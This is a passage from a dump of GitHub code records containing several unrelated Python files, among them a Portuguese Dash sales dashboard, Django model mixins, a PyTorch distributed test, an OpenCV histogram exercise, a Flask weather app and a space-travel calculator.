< mz:\n if v[z + 1][y][x] in conn or not part2:\n sa += 1 - volume[z + 1][y][x]\n else: sa += 1\n\nprint(sa)\n","repo_name":"IljaSobolev/aoc2022","sub_path":"d18/d18.py","file_name":"d18.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18788247343","text":"import dash\nfrom dash import html\nimport pandas as pd\nimport dash_bootstrap_components as dbc\nfrom dash import Input, Output, State, html, dash_table, callback, dcc\nfrom db import consulta\nimport plotly.express as px\nfrom datetime import datetime\n\ndash.register_page(__name__, path='/',name='Página Inicial')\n\ndef tabelas():\n \"\"\" Tabelas da página inicial. \"\"\"\n colunas = ['Id', 'Nome', 'Idade', 'Data de Admissão', 'Setor', 'Estado']\n lista = []\n recset = consulta('select * from pessoa')\n for rec in recset:\n lista.append(rec)\n dfTC = pd.DataFrame(lista, columns=colunas)\n dfTC = dfTC.sort_values(by=['Id'])\n dfTC = dfTC.reset_index(drop=True)\n dfTC['Data de Admissão'] = pd.to_datetime(dfTC['Data de Admissão']).dt.strftime('%d/%m/%Y')\n\n dfTCg = dfTC.groupby(['Estado','Setor']).count()\n dfTCg = dfTCg.rename(columns={'Nome':'Colaboradores'})\n dfTCg = dfTCg['Colaboradores']\n dfTCg = dfTCg.reset_index()\n\n figdfTC = px.bar(dfTCg, x=\"Estado\", y=\"Colaboradores\", color=\"Setor\", barmode=\"group\", text_auto=True)\n figdfTC.update_traces(textposition=\"outside\")\n\n colunas = ['Id', 'Nome', 'Valor', 'Categoria', 'Estoque']\n lista = []\n recset = consulta('select * from produto')\n for rec in recset:\n lista.append(rec)\n dfTP = pd.DataFrame(lista, columns=colunas)\n dfTP = dfTP.sort_values(by=['Id'])\n dfTP = dfTP.reset_index(drop=True)\n dfTP['Valor'] = dfTP['Valor'].apply(lambda x: f'R$ {x:_.2f}'.replace('.', ',').replace('_', '.'))\n\n dfTPg = dfTP[['Nome', 'Estoque', 'Categoria']]\n dfTPg = dfTPg.rename(columns={'Nome':'Produtos'})\n dfTPg = dfTPg[dfTPg['Estoque'] <= 5]\n\n figdfTP = px.bar(dfTPg, x=\"Estoque\", y=\"Produtos\", color=\"Categoria\", text_auto=True, orientation='h')\n figdfTP.update_traces(textposition=\"outside\")\n\n colunas = ['Id', 'Nome', 'CPF', 'Data de Inclusão', 'Status', 'Estado']\n lista = []\n recset = consulta('select * from cliente')\n for rec in recset:\n lista.append(rec)\n dfCL = pd.DataFrame(lista, columns=colunas)\n dfCL = dfCL.sort_values(by=['Id'])\n dfCL = dfCL.reset_index(drop=True)\n\n dfCLg = dfCL.groupby(['Estado','Status']).count()\n dfCLg = dfCLg.rename(columns={'Nome':'Clientes'})\n dfCLg = dfCLg['Clientes']\n dfCLg = dfCLg.reset_index()\n\n figdfCL = px.bar(dfCLg, x=\"Estado\", y=\"Clientes\", color=\"Status\", text_auto=True)\n figdfCL.update_traces(textposition=\"outside\")\n\n colunas = ['Id Pedido', 'Vendedor', 'Cliente', 'Total', 'Data']\n lista = []\n recset = consulta('select * from pedido_lista')\n for rec in recset:\n lista.append(rec)\n PeLt = pd.DataFrame(lista, columns=colunas)\n PeLt = PeLt.sort_values(by=['Id Pedido'], ascending=False)\n PeLt = PeLt.reset_index(drop=True)\n PeLt['Total'] = PeLt['Total'].apply(lambda x: f'R$ {x:_.2f}'.replace('.', ',').replace('_', '.'))\n def criar_link(x):\n return f\"

      {x}

      \"\n def alinhar_link(x):\n return f\"

      {x}

      \"\n PeLt['Vendedor'] = PeLt['Vendedor'].apply(lambda x: alinhar_link(x))\n PeLt['Cliente'] = PeLt['Cliente'].apply(lambda x: alinhar_link(x))\n PeLt['Vendedor'] = PeLt['Vendedor'].apply(lambda x: alinhar_link(x))\n PeLt['Total'] = PeLt['Total'].apply(lambda x: alinhar_link(x))\n PeLt['Data'] = PeLt['Data'].apply(lambda x: alinhar_link(x))\n PeLt['Id Pedido'] = PeLt['Id Pedido'].apply(lambda x: criar_link(x))\n\n colunas = ['Id Transação', 'Id Vendedor', 'Valor', 'Quantidade', 'Data']\n lista = []\n recset = consulta('select idtransacao, idvendedor, valor, quantidade, iddata from pedido')\n for rec in recset:\n lista.append(rec)\n PeG = pd.DataFrame(lista, columns=colunas)\n PeG = PeG.sort_values(by=['Id Transação'])\n PeG = PeG.reset_index(drop=True)\n\n PeG['Mês'] = PeG['Data'].apply(lambda x: datetime.strptime(x, '%d/%m/%Y %H:%M'))\n PeG = PeG[(PeG['Mês'] >= datetime.strptime(f\"{datetime.today().day}/{(datetime.today().month - 6) if (datetime.today().month - 6) > 0 else (12 + (datetime.today().month - 6))}/{datetime.today().year if (datetime.today().month - 6) > 0 else (datetime.today().year - 1)}\", '%d/%m/%Y')) & (PeG['Mês'] <= datetime.today())]\n PeG2 = PeG.copy()\n PeG2['Total'] = PeG2['Quantidade'] * PeG2['Valor']\n PeG2['Mês'] = PeG2['Mês'].apply(lambda x: datetime.strptime(datetime.strftime(x, '%b - %Y'), '%b - %Y'))\n PeG2 = PeG2[['Mês', 'Total']].groupby(['Mês'],).sum().reset_index()\n \n figdfPe = px.line(PeG2, x='Mês', y=\"Total\", text=\"Total\")\n figdfPe.update_traces(textposition=\"top center\")\n\n return [\n dbc.Tabs(\n [\n dbc.Tab(\n #Tabela colaboradores tela inicial\n label=\"Colaboradores\",\n tab_id=\"colaboradores\",\n children = [\n html.H1(\"Consulta Colaboradores\", style={'textAlign': 'center', 'margin-top': '1%', 'margin-bottom': '1%'}),\n dash_table.DataTable(\n id='tabelaColaboradores',\n columns=[\n {\"name\": i, \"id\": i} for i in dfTC.columns\n ],\n data=dfTC.to_dict('records'),\n style_header = {'textAlign': 'center', 'font-weight':'bold'},\n style_data = {'textAlign': 'center'},\n filter_action=\"native\",\n filter_options = {'placeholder_text':'Filtar Dados...'},\n page_action=\"native\",\n page_current= 0,\n page_size= 10,\n persistence=True,\n cell_selectable=False\n ),\n html.Hr(style={'margin-top': '1%', 'margin-bottom': '1%'}),\n html.H2(\n [\"Gráficos\"],\n style={'margin-top': '1%', 'margin-bottom': '1%', 'textAlign': 'center'},\n ),\n html.H4(\n [\"Relação Colaboradores por Setor/Estado\"],\n style={'margin-top': '1%', 'margin-bottom': '1%'},\n ),\n dcc.Graph(\n id='grafico-colaboradores',\n figure=figdfTC,\n config={\"displayModeBar\": False}\n ),\n ],\n ),\n dbc.Tab(\n #Tabela produto tela inicial\n label=\"Produtos\",\n tab_id=\"Produtos\",\n children = [\n html.H1(\"Consulta Produtos\", style={'textAlign': 'center', 'margin-top': '1%', 'margin-bottom': '1%'}),\n dash_table.DataTable(\n id='tabelaProdutos',\n columns=[\n {\"name\": i, \"id\": i} for i in dfTP.columns\n ],\n data=dfTP.to_dict('records'),\n style_header = {'textAlign': 'center', 'font-weight':'bold'},\n filter_action=\"native\",\n style_data = {'textAlign': 'center'},\n filter_options = {'placeholder_text':'Filtar Dados...'},\n page_action=\"native\",\n page_current= 0,\n page_size= 10,\n persistence=True,\n cell_selectable=False\n ),\n html.Hr(style={'margin-top': '1%', 'margin-bottom': '1%'}),\n html.H2(\n [\"Gráficos\"],\n style={'margin-top': '1%', 'margin-bottom': '1%', 'textAlign': 'center'},\n ),\n html.H4(\n [\"Relação Produtos com Baixo Estoque\"],\n style={'margin-top': '1%', 'margin-bottom': '1%'},\n ),\n dbc.InputGroup(\n [\n dbc.InputGroupText(\"Mínimo:\"), \n dbc.Input(placeholder=\"Inserir valor mínimo\", type=\"number\", id='idmin', value=0),\n dbc.InputGroupText(\"Máximo:\"),\n dbc.Input(placeholder=\"Inserir valor máximo\", type=\"number\", id='idmax', value=5),\n dbc.Button('Pesquisar', id='botaoPesquisarG2'),\n ],\n className=\"mb-3\",\n style={'margin-top': '2%'}\n ),\n html.Div(\n [\n dcc.Graph(\n id='grafico-produtos',\n figure=figdfTP,\n config={\"displayModeBar\": False}\n ),\n ],\n id='alt-grafico-produtos'\n ),\n ],\n ),\n dbc.Tab(\n #Tabela produto tela inicial\n label=\"Clientes\",\n tab_id=\"Clientes\",\n children = [\n html.H1(\"Consulta Clientes\", style={'textAlign': 'center', 'margin-top': '1%', 'margin-bottom': '1%'}),\n dash_table.DataTable(\n id='tabelaClientes',\n columns=[\n {\"name\": i, \"id\": i} for i in dfCL.columns\n ],\n data=dfCL.to_dict('records'),\n style_header = {'textAlign': 'center', 'font-weight':'bold'},\n filter_action=\"native\",\n style_data = {'textAlign': 'center'},\n filter_options = {'placeholder_text':'Filtar Dados...'},\n page_action=\"native\",\n page_current= 0,\n page_size= 10,\n persistence=True,\n cell_selectable=False\n ),\n html.Hr(style={'margin-top': '1%', 'margin-bottom': '1%'}),\n html.H2(\n [\"Gráficos\"],\n style={'margin-top': '1%', 'margin-bottom': '1%', 'textAlign': 'center'},\n ),\n html.H4(\n [\"Relação Clientes por Estado\"],\n style={'margin-top': '1%', 'margin-bottom': '1%'},\n ),\n dcc.Graph(\n id='grafico-clientes',\n figure=figdfCL,\n config={\"displayModeBar\": False}\n ),\n ],\n ),\n dbc.Tab(\n #Tabela produto tela inicial\n label=\"Pedidos\",\n tab_id=\"Pedidos\",\n children = [\n html.H1(\"Consulta Pedidos\", style={'textAlign': 'center', 'margin-top': '1%', 'margin-bottom': '1%'}),\n dash_table.DataTable(\n id='tabelaPedidos',\n columns=[\n {\"name\": i, \"id\": i, \"presentation\": \"markdown\"} for i in PeLt.columns\n ],\n data=PeLt.to_dict('records'),\n style_header = {'textAlign': 'center', 'font-weight':'bold'},\n filter_action=\"native\",\n style_data = {'textAlign': 'center'},\n filter_options = {'placeholder_text':'Filtar Dados...'},\n page_action=\"native\",\n page_current= 0,\n page_size= 10,\n persistence=True,\n cell_selectable=False,\n markdown_options={\"html\": True}\n ),\n html.Hr(style={'margin-top': '1%', 'margin-bottom': '1%'}),\n html.H2(\n [\"Gráficos\"],\n style={'margin-top': '1%', 'margin-bottom': '1%', 'textAlign': 'center'},\n ),\n html.H4(\n [\"Relação Valor dos Pedidos por Data (Padrão 6 Meses)\"],\n style={'margin-top': '1%', 'margin-bottom': '1%'},\n ),\n dbc.InputGroup(\n [\n dbc.InputGroupText(\"Data: \"), \n dbc.Input(placeholder=\"Inserir data inicial\", type=\"date\", id='datamin'),\n dbc.InputGroupText(\" Até \"),\n dbc.Input(placeholder=\"Inserir data final\", type=\"date\", id='datamax'),\n dbc.Button('Pesquisar', id='botaoPesquisarG4'),\n ],\n className=\"mb-3\",\n style={'margin-top': '2%'}\n ),\n html.Div(\n [\n dcc.Graph(\n id='grafico-pedidos',\n figure=figdfPe,\n config={\"displayModeBar\": False}\n ),\n ],\n id='alt-grafico-pedidos'\n ),\n ],\n ),\n ],\n id=\"tabs\",\n persistence='True',\n ),\n ]\n\nlayout = html.Div(children=[\n html.Div(\n dbc.Button(\"Atualizar Dados\", color=\"warning\", className=\"mb-3\", id='atualizar'),\n ),\n html.Div(\n [],\n id='tabelas',\n className='output-example-loading',\n ),\n])\n\n@callback(\n Output(\"tabelas\", \"children\"),\n Input(\"atualizar\", \"n_clicks\"),\n)\ndef tabelasFunc(n1):\n \"\"\" Função botão atualizar informações tabelas iniciais. \"\"\"\n if n1:\n return tabelas()\n return tabelas()\n\n@callback(\n Output(\"alt-grafico-produtos\", \"children\"),\n Input(\"botaoPesquisarG2\", \"n_clicks\"),\n State(\"alt-grafico-produtos\", \"children\"),\n State(\"idmin\", \"value\"),\n State(\"idmax\", \"value\"),\n )\ndef tabelaProdutos(n_clicks, n1, v1, v2):\n \"\"\" Inserir sacola \"\"\"\n global dfTP\n if n_clicks:\n if v1 == None or v2 == None:\n return n1\n else:\n colunas = ['Id', 'Nome', 'Valor', 'Categoria', 'Estoque']\n lista = []\n recset = consulta('select * from produto')\n for rec in recset:\n lista.append(rec)\n dfTP = pd.DataFrame(lista, columns=colunas)\n dfTP = dfTP.sort_values(by=['Id'])\n dfTP = dfTP.reset_index(drop=True)\n dfTP['Valor'] = dfTP['Valor'].apply(lambda x: f'R$ {x:_.2f}'.replace('.', ',').replace('_', '.'))\n\n dfTPg = dfTP[['Nome', 'Estoque', 'Categoria']]\n dfTPg = dfTPg.rename(columns={'Nome':'Produtos'})\n dfTPg = dfTPg[(dfTPg['Estoque'] >= v1) & (dfTPg['Estoque'] <= v2)]\n\n figdfTP = px.bar(dfTPg, x=\"Estoque\", y=\"Produtos\", color=\"Categoria\", text_auto=True, orientation='h')\n figdfTP.update_traces(textposition=\"outside\")\n\n return [\n dcc.Graph(\n id='grafico-produtos',\n figure=figdfTP,\n config={\"displayModeBar\": False}\n ),\n ]\n return n1\n\n@callback(\n Output(\"alt-grafico-pedidos\", \"children\"),\n Input(\"botaoPesquisarG4\", \"n_clicks\"),\n State(\"alt-grafico-pedidos\", \"children\"),\n State(\"datamin\", \"value\"),\n State(\"datamax\", \"value\"),\n )\ndef tabelaPedidos(n_clicks, n1, v1, v2):\n \"\"\" Inserir sacola \"\"\"\n global dfTP\n if n_clicks:\n if v1 == None or v2 == None or v1 == \"\" or v2 == \"\":\n return n1\n else:\n colunas = ['Id Transação', 'Id Vendedor', 'Valor', 'Quantidade', 'Data']\n lista = []\n recset = consulta('select idtransacao, idvendedor, valor, quantidade, iddata from pedido')\n for rec in recset:\n lista.append(rec)\n PeG = pd.DataFrame(lista, columns=colunas)\n PeG = PeG.sort_values(by=['Id Transação'])\n PeG = PeG.reset_index(drop=True)\n\n print(f'{v1} - {v2}')\n\n PeG['Mês'] = PeG['Data'].apply(lambda x: datetime.strptime(x, '%d/%m/%Y %H:%M'))\n PeG = PeG[(PeG['Mês'] >= datetime.strptime(v1, '%Y-%m-%d')) & (PeG['Mês'] <= datetime.strptime(v2, '%Y-%m-%d'))]\n PeG2 = PeG.copy()\n PeG2['Total'] = PeG2['Quantidade'] * PeG2['Valor']\n PeG2['Mês'] = PeG2['Mês'].apply(lambda x: datetime.strptime(datetime.strftime(x, '%b - %Y'), '%b - %Y')) \n PeG2 = PeG2[['Mês', 'Total']].groupby(['Mês'],).sum().reset_index()\n\n figdfPe = px.line(PeG2, x='Mês', y=\"Total\", text=\"Total\")\n figdfPe.update_traces(textposition=\"top center\")\n return [\n dcc.Graph(\n id='grafico-pedidos',\n figure=figdfPe,\n config={\"displayModeBar\": False}\n ),\n ]\n return n1","repo_name":"williamrdarosa/mini-sistema","sub_path":"pages/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":18715,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36474002050","text":"from datetime import timedelta\nfrom decimal import Decimal\nfrom typing import List\nfrom uuid import UUID\n\nfrom django.db import models\nfrom django.db.models import Field\nfrom django.utils import timezone\nimport django\nif django.VERSION >= (4, 0):\n from django.utils.translation import gettext_lazy as _\nelse:\n from django.utils.translation import ugettext_lazy as _ # pragma: no cover\n\nfrom gpp.datetimes import dt\nfrom gpp.model.fields import CompressedTextField\n\n\ndef default_value(field: Field):\n \"\"\"\n models.field에 형태에 임의의 값 반환\n\n :param field: models.Field instance\n :type field: models.Field\n :return:\n :rtype: Union[int, date, time, datetime, timedelta, byte, int, ...]\n \"\"\"\n mapping = [\n (models.CharField, '1'),\n (models.IntegerField, 1),\n (models.DateTimeField, dt(2020, 1, 1)),\n (models.DateField, dt(2020, 1, 1).date()),\n (models.TimeField, dt(2020, 1, 1).time()),\n (models.DecimalField, Decimal('123.456')),\n (models.DurationField, timedelta(seconds=1)),\n (models.BooleanField, True),\n (models.UUIDField, UUID('280a8a4d-a27f-4d01-b031-2a003cc4c039')),\n (CompressedTextField, 'abc'),\n (models.BinaryField, b'abc'),\n (models.TextField, '1'),\n (models.GenericIPAddressField, '1.1.1.1'),\n (models.FilePathField, '/a.txt'),\n (models.FloatField, 1.0),\n ]\n for f, v in mapping:\n if isinstance(field, f):\n return v\n\n\nclass BaseModelMixin(models.Model):\n \"\"\"\n PK mixin\n \"\"\"\n id = models.BigAutoField(primary_key=True)\n created = models.DateTimeField(_('created date'), blank=True, editable=False)\n modified = models.DateTimeField(_('modified date'), blank=True, editable=False)\n\n class Meta:\n abstract = True\n\n @classmethod\n def dummy(cls, save=False, **kwargs):\n \"\"\"\n dummy 데이터 생성\n\n :param save: DB 저장 여부\n :type save: bool\n :param kwargs: parameter\n :type kwargs: dict\n :return: instance\n :type: Type[cls]\n \"\"\"\n for field in cls._meta.fields:\n if field.attname in {'id'}:\n continue\n if field.attname not in kwargs:\n kwargs.update({field.attname: default_value(field)})\n\n instance = cls(**kwargs)\n if save:\n instance.save()\n return instance\n\n def save(self, *args, **kwargs):\n now = timezone.now()\n if not self.created:\n self.created = now\n if 'update_fields' in kwargs:\n kwargs['update_fields'].append('created')\n\n update_fields = kwargs.get('update_fields', None)\n if not update_fields:\n self.modified = now\n elif isinstance(update_fields, list) and 'modified' not in update_fields:\n self.modified = now\n update_fields.append('modified')\n\n super(BaseModelMixin, self).save(*args, **kwargs)\n\n\nclass TaskModelMixin(models.Model):\n \"\"\"\n Async Task 모델 Mixin\n Task Status와 관련된 field 모음.\n \"\"\"\n CHOICE_TASK_STATUS_QUEUED = 10 # push to MQ\n CHOICE_TASK_STATUS_PROGRESSING = 20 # pop from MQ\n CHOICE_TASK_STATUS_ERROR = 30 # something wrong...\n CHOICE_TASK_STATUS_COMPLETED = 40 # complete\n\n CHOICE_TASK_STATUS = (\n (CHOICE_TASK_STATUS_QUEUED, _('in queued')),\n (CHOICE_TASK_STATUS_PROGRESSING, _('in processing')),\n (CHOICE_TASK_STATUS_ERROR, _('error')),\n (CHOICE_TASK_STATUS_COMPLETED, _('completed')),\n )\n\n task_status = models.PositiveSmallIntegerField(\n _('status of crawling task'),\n choices=CHOICE_TASK_STATUS,\n default=CHOICE_TASK_STATUS_QUEUED,\n )\n queued_datetime = models.DateTimeField(_('queued datetime'), null=True, blank=True, default=None)\n processing_datetime = models.DateTimeField(_('processing datetime'), null=True, blank=True, default=None)\n error_datetime = models.DateTimeField(_('error datetime'), null=True, blank=True, default=None)\n completed_datetime = models.DateTimeField(_('completed datetime'), null=True, blank=True, default=None)\n\n def set_completed(self, save: bool, update_fields: List):\n self.task_status = self.CHOICE_TASK_STATUS_COMPLETED\n self.completed_datetime = timezone.now()\n\n # cache를 이용할 때는 queued, processing 데이터가 없음.\n if not self.queued_datetime:\n self.queued_datetime = self.completed_datetime\n update_fields.append('queued_datetime')\n\n if not self.processing_datetime:\n self.processing_datetime = self.completed_datetime\n update_fields.append('processing_datetime')\n\n if save:\n self.save(\n update_fields=update_fields + ['task_status', 'completed_datetime']\n )\n\n def set_error(self, save: bool, msg: str, update_fields: List):\n self.task_status = self.CHOICE_TASK_STATUS_ERROR\n self.error_datetime = timezone.now()\n\n # cache를 이용할 때는 queued, processing 데이터가 없음.\n if not self.queued_datetime:\n self.queued_datetime = self.error_datetime\n update_fields.append('queued_datetime')\n\n if not self.processing_datetime:\n self.processing_datetime = self.error_datetime\n update_fields.append('processing_datetime')\n\n if save:\n self.save(\n update_fields=update_fields + ['task_status', 'error_datetime']\n )\n\n def set_processing(self, save: bool, update_fields: List):\n self.task_status = self.CHOICE_TASK_STATUS_PROGRESSING\n self.processing_datetime = timezone.now()\n\n if not self.queued_datetime:\n self.queued_datetime = self.processing_datetime\n update_fields.append('queued_datetime')\n\n if save:\n self.save(\n update_fields=update_fields + ['task_status', 'processing_datetime']\n )\n\n @property\n def is_queued_task(self):\n return self.task_status == self.CHOICE_TASK_STATUS_QUEUED\n\n @property\n def is_processing_task(self):\n return self.task_status == self.CHOICE_TASK_STATUS_PROGRESSING\n\n @property\n def is_error_task(self):\n return self.task_status == self.CHOICE_TASK_STATUS_ERROR\n\n @property\n def is_completed_task(self):\n return self.task_status == self.CHOICE_TASK_STATUS_COMPLETED\n\n @property\n def task_badge_class(self):\n mapping = {\n self.CHOICE_TASK_STATUS_QUEUED: 'bg-secondary',\n self.CHOICE_TASK_STATUS_PROGRESSING: 'bg-info',\n self.CHOICE_TASK_STATUS_ERROR: 'bg-danger',\n self.CHOICE_TASK_STATUS_COMPLETED: 'bg-success',\n }\n return mapping.get(self.task_status, '')\n\n class Meta:\n abstract = True\n","repo_name":"Gaolious/py_extension_functions","sub_path":"gpp/model/base_mixins.py","file_name":"base_mixins.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3995434314","text":"import torch\nimport torch.nn as nn\nfrom global_variables.common import get_is_checkpoint, get_worker_num\n\nfrom global_variables.config import cfg\nfrom models.general_model import init_model\nfrom models.mobilenetv2.model import MobileNetV2\nfrom utils.general import weight_sync\nimport math\nimport time\n\n\ndef test_distribute(test_dataloader, epoch):\n \"\"\"\n test model on test_dataloader under distributed environment\n \"\"\"\n # 这里采取的方法是同步权重,在本地进行 test\n print(\"Synchronizing weight from other workers...\")\n # model = init_model(cfg.model_name, cfg.model_args)\n sub_models = weight_sync()\n\n is_checkpoint = get_is_checkpoint()\n \n for i in range(get_worker_num()):\n sub_models[i].eval()\n if is_checkpoint:\n save_path = \"./model_state/sub_model_{}_epoch_{}_{}.pkl\".format(i, epoch, math.floor(time.time()))\n torch.save(sub_models[i].state_dict(), save_path)\n \n correct, total = 0, 0\n loss, counter = 0, 0\n criterion = nn.CrossEntropyLoss()\n\n print(\"Start test evaluation...\")\n with torch.no_grad():\n for (images, labels) in test_dataloader:\n if cfg.data.name == 'MNIST':\n images = images.repeat(1, 3, 1, 1) \n x = images\n for i in range(get_worker_num()):\n x = sub_models[i](x)\n \n outputs = x\n _, predicted = torch.max(outputs.data, 1)\n\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n loss += criterion(outputs, labels).item()\n counter += 1\n\n del sub_models # before deletion, weight should be stored ?\n return loss / counter, correct / total * 100","repo_name":"qyy2003/FTPipeHD","sub_path":"utils/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73036421954","text":"import cv2\nimport matplotlib.pyplot as plt\n\n# Ler uma imagem rgb\nimage = cv2.imread('car.jpg')\n\n# Transformando para escala de cinza\ngrayscale_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# Equalizar a imagem\nequalized_image = cv2.equalizeHist(grayscale_image)\n\n# Calcular histogramas da imagem original e da imagem equalizada usando apenas openCV\noriginal_hist = cv2.calcHist(grayscale_image, channels=[0], mask=None, histSize=[256], ranges=[0, 256])\nequalized_hist = cv2.calcHist(equalized_image, channels=[0], mask=None, histSize=[256], ranges=[0, 256])\n\n# Mostrar a imagem original, a imagem equalizada e seus histogramas\n# Em python, podemos calcular e mostrar os histogramas usando apenas matplotlib\nplt.figure(1)\nplt.subplot(221)\nplt.imshow(grayscale_image, cmap='gray')\nplt.subplot(222)\nplt.hist(grayscale_image.ravel(), 256, [0, 256])\nplt.subplot(223)\nplt.imshow(equalized_image, cmap='gray')\nplt.subplot(224)\nplt.hist(equalized_image.ravel(), 256, [0, 256])\nplt.show()\n","repo_name":"danielbragga/LapiscoTraining--IC","sub_path":"Questions/16/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25129623888","text":"from flask import Flask, render_template, url_for, request, flash\r\nimport sqlite3\r\nimport requests, json\r\n\r\napp = Flask(__name__)\r\napp.secret_key = 'This_is_very_secret'\r\n\r\n@app.route('/', methods = ['GET', 'POST'])\r\ndef main():\r\n print(request.method)\r\n if request.method == 'POST':\r\n api_key = \"73c61ac872812494ce058fca44377691\"\r\n base_url = \"http://api.openweathermap.org/data/2.5/weather?\"\r\n city_name = request.form['City']\r\n complete_url = base_url + \"appid=\" + api_key + \"&q=\" + city_name\r\n response = requests.get(complete_url)\r\n\r\n x = response.json()\r\n\r\n if x[\"cod\"] != \"404\":\r\n\r\n y = x[\"main\"]\r\n\r\n current_temperature = y[\"temp\"]\r\n current_pressure = y[\"pressure\"]\r\n current_humidity = y[\"humidity\"]\r\n\r\n z = x[\"weather\"]\r\n\r\n weather_description = z[0][\"description\"]\r\n\r\n \r\n flash(\" Temperature (in kelvin unit) = \" +\r\n str(current_temperature) +\r\n \"\\n atmospheric pressure (in hPa unit) = \" +\r\n str(current_pressure) +\r\n \"\\n humidity (in percentage) = \" +\r\n str(current_humidity) +\r\n \"\\n description = \" +\r\n str(weather_description))\r\n \r\n message = [current_temperature, current_pressure, current_humidity, weather_description]\r\n \r\n else:\r\n print(\" City Not Found \")\r\n \r\n return render_template('home.html', message = message)\r\n\r\nif __name__ == '__main__': \r\n app.run(debug = True)","repo_name":"Br0atmeal/Help","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8215345045","text":"\"\"\"Tests `random.randint` python2 and python3 compatibility.\n\"\"\"\nfrom subprocess import Popen\nfrom subprocess import PIPE\nimport os\n\nMAIN_FILE = os.path.dirname(os.path.realpath(__file__)).replace(\"test\", \"__main__\")\n\n\ndef test_randint_compability():\n \"\"\"Tests if initegers generated by python 2 and python 3 randint are the same.\n\n Generate several random integers for several seeds and compares them.\n \"\"\"\n n_int = 100\n os.environ[\"PYTHONHASHSEED\"] = \"0\"\n\n for seed_init in [\"1a.500\", \"2e.305\", \"1e.500\"]:\n for low in [0, 10, 100]:\n for width in [5, 10, 100]:\n high = low + width\n args = [\n MAIN_FILE,\n seed_init,\n \"-n\",\n str(n_int),\n \"--low\",\n str(low),\n \"--high\",\n str(high),\n ]\n print(*args)\n p = Popen([\"python2\"] + args, stdin=PIPE, stdout=PIPE, stderr=PIPE)\n py2_rands, _ = p.communicate()\n p = Popen([\"python3\"] + args, stdin=PIPE, stdout=PIPE, stderr=PIPE)\n py3_rands, _ = p.communicate()\n\n assert py2_rands == py3_rands\n print(py2_rands)\n","repo_name":"callat-qcd/nucleon_elastic_FF","sub_path":"scripts/random_patch/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33892949741","text":"import torch\n\n\n# pos_preds is (N_actors, N_modes, T, 2)\n# probs is (N_modes)\n# GT is (N_actors, T, 2)\ndef multi_mode_loss_L2(pos_preds, probs, GT):\n pred_size = list(pos_preds.size())\n T = pred_size[2]\n \n GT = GT[:,None,:,:]\n \n # shape (N_actors, N_modes, T, 2)\n sq_dif = torch.square(pos_preds - GT)\n # shape (N_actors, N_modes, T)\n L2_per_timestep = torch.sqrt(torch.sum(sq_dif, 3))\n # shape (N_actors, N_modes)\n ADE_per_actor_per_mode_per_ten = torch.sum(L2_per_timestep[:, :, range(0, T, 10)], 2) / T * 10\n ADE_per_actor_per_mode = torch.sum(L2_per_timestep, 2) / T\n # shape (N_modes)\n ADE_per_mode = torch.sum(ADE_per_actor_per_mode, 0)\n # shape (,)\n best_mode = torch.argmin(ADE_per_mode, 0).type(torch.LongTensor).cuda()\n min_ADE = torch.index_select(ADE_per_mode, 0, best_mode)\n min_ADE_prob = torch.index_select(probs, 0, best_mode)\n min_ADE_CrossEnt = -1*torch.log(min_ADE_prob+1e-5)\n \n return min_ADE, min_ADE_CrossEnt\n","repo_name":"SambaranRepo/VectorNet_Waymo","sub_path":"utils/MTP_loss.py","file_name":"MTP_loss.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"61"} +{"seq_id":"23257074472","text":"#Escribe una función que pueda decirte si un año (número entero) es bisiesto o no:\n\naño = int(input('Por favor, ingrese el año a consultar:\\n'))\n\ndef bisiesto(año):\n if año % 4 == 0 and año % 100 != 0:\n return True\n \n elif año % 100 == 0 and año % 400 == 0:\n return True\n else:\n False\n \nprint(bisiesto(año))","repo_name":"Franjas/Curso-python","sub_path":"ejercicios12.py","file_name":"ejercicios12.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17293231427","text":"import math\n\n#constants\nsecondsDay = 86400\nspeed_of_light = 299792458\nulaCharge = 14830\nspaceXInsurance = 0.3\nspaceXCharge = 2720\nlightYear = 9460730472580800\n\nchoice = 0\n\nwhile choice != 4:\n\n #prompt user\n print('Main menu: \\n1. Warp speed \\n2. Cost to Launch \\n' \\\n '3. Time Dilation \\n4. Quit \\n')\n\n choice = int(input('Please choose an option: '))\n\n #validate\n while choice < 1 or choice > 4:\n choice = int(input('Please choose an option: '))\n\n #choice number 1\n #input and validation\n if choice == 1:\n ship_speed = float(input(\"Please input ship's speed in \" \\\n \"units of warp factor: \"))\n while ship_speed < 0:\n ship_speed = float(input(\"Please input ship's speed in \" \\\n \"units of warp factor: \"))\n ship_speed = (((ship_speed ** 10) ** (1/3)) * speed_of_light)\n\n #print results\n print('You are now traveling at',format(ship_speed, ',.2f'), \\\n 'meters per second.')\n\n #choice number 2 \n elif choice == 2:\n satellite_mass = float(input(\"Please enter satellite's mass in kilograms: \"))\n while satellite_mass < 1:\n satellite_mass = float(input(\"Please enter satellite's mass in \" \\\n \"kilograms: \"))\n satellite_manufacture = float(input(\"Please enter satellite's manufacture \" \\\n \"cost in US dollars: \"))\n while satellite_manufacture < 1:\n satellite_manufacture = float(input(\"Please enter satellite's \" \\\n \"manufacture cost in US dollars: \"))\n\n #calculate costs\n ulaCost = satellite_mass * ulaCharge\n spaceInsurance = satellite_manufacture * 